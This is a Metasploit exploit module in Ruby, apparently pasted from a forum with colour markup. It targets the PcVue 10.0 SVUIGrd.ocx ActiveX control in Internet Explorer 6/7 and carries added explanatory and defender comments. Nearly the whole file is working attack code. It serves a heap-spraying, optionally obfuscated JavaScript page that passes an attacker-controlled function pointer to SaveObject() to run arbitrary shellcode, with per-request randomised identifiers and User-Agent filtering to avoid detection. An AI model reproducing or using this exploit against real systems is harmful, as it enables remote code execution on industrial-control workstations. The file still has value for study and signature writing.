[COLOR=#008200]## [/COLOR]
[COLOR=#008200]# $Id: pcvue_func.rb 13889 2011-10-12 10:57:31Z sinn3r $ [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]# This file is part of the ****sploit Framework and may be subject to [/COLOR]
[COLOR=#008200]# redistribution and commercial restrictions. Please see the ****sploit [/COLOR]
[COLOR=#008200]# Framework web site for more information on licensing and terms of use. [/COLOR]
[COLOR=#008200]# http://****sploit.com/framework/ [/COLOR]
[COLOR=#008200]## [/COLOR]
require [COLOR=#0000ff]'msf/core'[/COLOR]
# Browser-side exploit module for the PcVue 10.0 SV.UIGrdCtrl.1 ActiveX control
# (CLSID 2BBD45A5-28AE-11D1-ACAC-0800170967D9, see the <object> tag below).
# The served page sprays the client's JavaScript heap and then passes a DWORD
# of the attacker's choosing to the control's SaveObject() method, which the
# control treats as a function pointer (per the Description).
# Defender notes: every served page contains the fixed CLSID and the call name
# SaveObject(), while all JavaScript identifiers are randomised per request;
# the page is only served to User-Agents matching IE 6.0/7.0, everything else
# gets a 404. Setting the IE kill bit for that CLSID blocks instantiation (the
# trailer of this file notes the affected control ships with "KillBitSet: False").
[B][COLOR=#006699]class[/COLOR][/B] ****sploit3 < Msf::Exploit::Remote
# Average: success depends on the heap spray below covering target.ret.
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::[COLOR=#0066cc]HTML[/COLOR]
# Declares module metadata (name, description, references, payload
# constraints, the single IE 6/7 target) and the FILENAME / OBFUSCATE options.
# @param info [Hash] module info, merged through update_info
[B][COLOR=#006699]def[/COLOR][/B] initialize(info = {})
[B][COLOR=#006699]super[/COLOR][/B](update_info(info,
[COLOR=#0000ff]'Name'[/COLOR] => [COLOR=#0000ff]"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability"[/COLOR],
[COLOR=#0000ff]'Description'[/COLOR] => %q{
This [B][COLOR=#006699]module[/COLOR][/B] exploits a function pointer control within SVUIGrd.ocx of PcVue [COLOR=#0066cc]10[/COLOR].[COLOR=#0066cc]0[/COLOR].
By setting a dword value [B][COLOR=#006699]for[/COLOR][/B] the SaveObject() [B][COLOR=#006699]or[/COLOR][/B] LoadObject(), an attacker can
overwrite a function pointer [B][COLOR=#006699]and[/COLOR][/B] execute arbitrary code.
},
[COLOR=#0000ff]'License'[/COLOR] => [COLOR=#0066cc]MSF_LICENSE[/COLOR],
[COLOR=#0000ff]'Author'[/COLOR] =>
[
[COLOR=#0000ff]'Luigi Auriemma'[/COLOR], [COLOR=#008200]# original find [/COLOR]
[COLOR=#0000ff]'mr_me <steventhomasseeley[at]gmail-com>'[/COLOR], [COLOR=#008200]# msf module [/COLOR]
[COLOR=#0000ff]'TecR0c <roccogiovannicalvi[at]gmail-com >'[/COLOR],[COLOR=#008200]# msf module [/COLOR]
],
[COLOR=#0000ff]'Version'[/COLOR] => [COLOR=#0000ff]'$Revision: 13889 $'[/COLOR],
[COLOR=#0000ff]'References'[/COLOR] =>
[
[ [COLOR=#0000ff]'BID'[/COLOR], [COLOR=#0000ff]'49795'[/COLOR]],
[ [COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'[/COLOR]],
],
[COLOR=#0000ff]'DefaultOptions'[/COLOR] =>
{
[COLOR=#0000ff]'EXITFUNC'[/COLOR] => [COLOR=#0000ff]'process'[/COLOR],
[COLOR=#0000ff]'InitialAutoRunScript'[/COLOR] => [COLOR=#0000ff]'migrate -f'[/COLOR]
},
[COLOR=#0000ff]'Payload'[/COLOR] =>
{
[COLOR=#0000ff]'Space'[/COLOR] => [COLOR=#0066cc]1024[/COLOR],
# NUL/CR/LF are excluded — presumably so the encoded payload survives the JS
# unescape() string and the heredoc it is embedded in; confirm.
[COLOR=#0000ff]'BadChars'[/COLOR] => [COLOR=#0000ff]"\x00\x0a\x0d"[/COLOR],
[COLOR=#0000ff]'StackAdjustment'[/COLOR] => -[COLOR=#0066cc]3500[/COLOR],
},
[COLOR=#0000ff]'Platform'[/COLOR] => [COLOR=#0000ff]'win'[/COLOR],
[COLOR=#0000ff]'Targets'[/COLOR] =>
[
[
[COLOR=#008200]#IE 6/7 on Windows XP and Vista [/COLOR]
[COLOR=#0000ff]'Internet Explorer 6 / Internet Explorer 7'[/COLOR],
{
# 0x0a0a0a0a doubles as the content of the sprayed "sled" (see nops in
# on_request_uri) and as the DWORD handed to SaveObject(), so the spray
# must cover this address for the module to work.
[COLOR=#0000ff]'Ret'[/COLOR] => 0x0a0a0a0a,
# 'Offset' is not read anywhere in this module's code.
[COLOR=#0000ff]'Offset'[/COLOR] => [COLOR=#0066cc]1000[/COLOR]
}
]
],
[COLOR=#0000ff]'DisclosureDate'[/COLOR] => [COLOR=#0000ff]'Oct 5 2011'[/COLOR],
[COLOR=#0000ff]'DefaultTarget'[/COLOR] => [COLOR=#0066cc]0[/COLOR]))
# FILENAME is registered but not referenced by the code shown here;
# OBFUSCATE toggles JSObfu in on_request_uri (default: on).
register_options(
[
OptString.[B][COLOR=#006699]new[/COLOR][/B]([COLOR=#0000ff]'FILENAME'[/COLOR], [ [B][COLOR=#006699]false[/COLOR][/B], [COLOR=#0000ff]'The file name.'[/COLOR], [COLOR=#0000ff]'msf.html'[/COLOR]]),
OptBool.[B][COLOR=#006699]new[/COLOR][/B]([COLOR=#0000ff]'OBFUSCATE'[/COLOR], [[B][COLOR=#006699]false[/COLOR][/B], [COLOR=#0000ff]'Enable JavaScript Obfuscation'[/COLOR], [B][COLOR=#006699]true[/COLOR][/B]]),
], [B][COLOR=#006699]self[/COLOR][/B].[B][COLOR=#006699]class[/COLOR][/B])
[B][COLOR=#006699]end[/COLOR][/B]
# Builds and sends the exploit page for one HTTP request.
# @param cli the client connection (used for peerhost/peerport and the reply)
# @param request [Rex::Proto::Http::Request] the incoming request; only its
#   User-Agent header is inspected
# Clients that are not IE 6.0/7.0 (or send no User-Agent) receive a 404.
[B][COLOR=#006699]def[/COLOR][/B] on_request_uri(cli, request)
[COLOR=#008200]#If not IE, we don't continue [/COLOR]
# A missing header leaves agent nil; nil !~ regex is true, so it is rejected too.
agent = request.headers[[COLOR=#0000ff]'User-Agent'[/COLOR]]
# NOTE(review): "[6|7]" is a character class of '6', '|' and '7', so it also
# matches "MSIE |.0"; "[67]" is the intended class. Harmless here, but misleading.
[B][COLOR=#006699]if[/COLOR][/B] agent !~ /[COLOR=#0066cc]MSIE[/COLOR] [[COLOR=#0066cc]6[/COLOR]|[COLOR=#0066cc]7[/COLOR]]\.[COLOR=#0066cc]0[/COLOR]/
print_error([COLOR=#0000ff]"Target not supported: #{agent.to_s}"[/COLOR])
send_not_found(cli)
[B][COLOR=#006699]return[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
[COLOR=#008200]# Encode the shellcode [/COLOR]
# Payload bytes as a JavaScript %u-escaped string in the target's byte order.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
[COLOR=#008200]# Setup exploit buffers [/COLOR]
# "nops" is really target.ret packed little-endian ('V') and %u-escaped: the
# sprayed blocks are filled with the return address itself.
nops = Rex::Text.to_unescape([target.ret].pack([COLOR=#0000ff]'V'[/COLOR]))
# The same address formatted as the literal DWORD argument for SaveObject().
ret = [COLOR=#0000ff]"0x%08x"[/COLOR] % target.ret
# Spray geometry: each block is grown by doubling until about blocksize bytes,
# and fillto of them are kept alive in a JavaScript array (see the JS below).
blocksize = 0x50000
fillto = [COLOR=#0066cc]200[/COLOR]
[COLOR=#008200]# Randomize the javascript variable names [/COLOR]
# Per-request random identifiers: j_* become JavaScript variables, obj_name is
# the <object> id. Only the CLSID and the SaveObject() call stay constant between
# requests, which is what a network signature should key on.
obj_name = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_shellcode = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_nops = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_ret = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_headersize = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_slackspace = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_fillblock = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_block = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_memory = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_counter = rand_text_alpha(rand([COLOR=#0066cc]30[/COLOR]) + [COLOR=#0066cc]2[/COLOR])
j_txt = rand_text_alpha(rand([COLOR=#0066cc]8[/COLOR]) + [COLOR=#0066cc]4[/COLOR])
# The #{...} sequences inside this heredoc are Ruby interpolations, not comments
# (the forum highlighter coloured them as such). The JavaScript assembles a
# sled+shellcode block, replicates it fillto times, and defines main(), which
# calls the control's SaveObject() with ret as the DWORD argument.
js = <<-[COLOR=#0066cc]EOF[/COLOR]
var [COLOR=#008200]#{j_shellcode} = unescape('#{shellcode}'); [/COLOR]
var [COLOR=#008200]#{j_nops} = unescape("#{nops}"); [/COLOR]
var [COLOR=#008200]#{j_headersize} = 20; [/COLOR]
var [COLOR=#008200]#{j_slackspace} = #{j_headersize} + #{j_shellcode}.length; [/COLOR]
[B][COLOR=#006699]while[/COLOR][/B]([COLOR=#008200]#{j_nops}.length < #{j_slackspace}) { [/COLOR]
[COLOR=#008200]#{j_nops} += #{j_nops}; [/COLOR]
}
var [COLOR=#008200]#{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace}); [/COLOR]
var [COLOR=#008200]#{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace}); [/COLOR]
[B][COLOR=#006699]while[/COLOR][/B](([COLOR=#008200]#{j_block}.length + #{j_slackspace}) < #{blocksize}) { [/COLOR]
[COLOR=#008200]#{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; [/COLOR]
}
[COLOR=#008200]#{j_memory} = new Array(); [/COLOR]
[B][COLOR=#006699]for[/COLOR][/B]([COLOR=#008200]#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){ [/COLOR]
[COLOR=#008200]#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ; [/COLOR]
}
function main(){
[COLOR=#008200]#{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0); [/COLOR]
}
[COLOR=#0066cc]EOF[/COLOR]
# <<-EOF keeps the heredoc's leading indentation; in the indented original this
# strips the two leading tabs (a no-op in this paste, where indentation was lost).
js = js.gsub(/^\t\t/, [COLOR=#0000ff]''[/COLOR])
[COLOR=#008200]#JS obfuscation on demand [/COLOR]
# JSObfu renames identifiers, so the entry point has to be looked up through
# js.sym('main'). The later #{js} interpolation presumably relies on
# JSObfu#to_s returning the obfuscated source — confirm.
[B][COLOR=#006699]if[/COLOR][/B] datastore[[COLOR=#0000ff]'OBFUSCATE'[/COLOR]]
js = ::Rex::Exploitation::JSObfu.[B][COLOR=#006699]new[/COLOR][/B](js)
js.obfuscate
main_sym = js.sym([COLOR=#0000ff]'main'[/COLOR])
[B][COLOR=#006699]else[/COLOR][/B]
main_sym = [COLOR=#0000ff]"main"[/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
# Final page. The <object> tag with the fixed CLSID is the stable part of every
# response; the script body varies per request.
content = <<-[COLOR=#0066cc]EOF[/COLOR]
<html>
<body>
<object classid=[COLOR=#0000ff]'clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9'[/COLOR] id=[COLOR=#0000ff]'#{obj_name}'[/COLOR] ></object>
<script language=[COLOR=#0000ff]'javascript'[/COLOR]>
[COLOR=#008200]#{js} [/COLOR]
[COLOR=#008200]#{main_sym}(); [/COLOR]
</script>
</body>
</html>
[COLOR=#0066cc]EOF[/COLOR]
[COLOR=#008200]#Remove the extra tabs from content [/COLOR]
content = content.gsub(/^\t\t/, [COLOR=#0000ff]''[/COLOR])
print_status([COLOR=#0000ff]"Sending exploit to #{cli.peerhost}:#{cli.peerport}"[/COLOR])
send_response(cli, content, {[COLOR=#0000ff]'Content-Type'[/COLOR]=>[COLOR=#0000ff]'text/html'[/COLOR]})
[COLOR=#006699][B]end[/B][/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
=[B][COLOR=#006699]begin[/COLOR][/B]
Tested successfully on the following platforms:
- PcVue [COLOR=#0066cc]10[/COLOR].[COLOR=#0066cc]0[/COLOR] (SVUIGrd.ocx v1.[COLOR=#0066cc]5[/COLOR].[COLOR=#0066cc]1[/COLOR].[COLOR=#0066cc]0[/COLOR]) on Internet Explorer [COLOR=#0066cc]6[/COLOR] & [COLOR=#0066cc]7[/COLOR], Windows [COLOR=#0066cc]XP[/COLOR] [COLOR=#0066cc]SP3[/COLOR]
[COLOR=#808080]Class[/COLOR] SVUIGrdCtrl
ProgID: [COLOR=#0066cc]SV[/COLOR].UIGrdCtrl.[COLOR=#0066cc]1[/COLOR]
[COLOR=#0066cc]GUID[/COLOR]: {[COLOR=#0066cc]2BBD45A5[/COLOR]-[COLOR=#0066cc]28AE[/COLOR]-[COLOR=#0066cc]11D1[/COLOR]-[COLOR=#0066cc]ACAC[/COLOR]-[COLOR=#0066cc]0800170967D9[/COLOR]}
Number of Interfaces: [COLOR=#0066cc]1[/COLOR]
Default Interface: ISVUIGrd
RegKey Safe [B][COLOR=#006699]for[/COLOR][/B] Script: False
RegkeySafe [B][COLOR=#006699]for[/COLOR][/B] Init: False
KillBitSet: False
=[B][COLOR=#006699]end[/COLOR][/B]
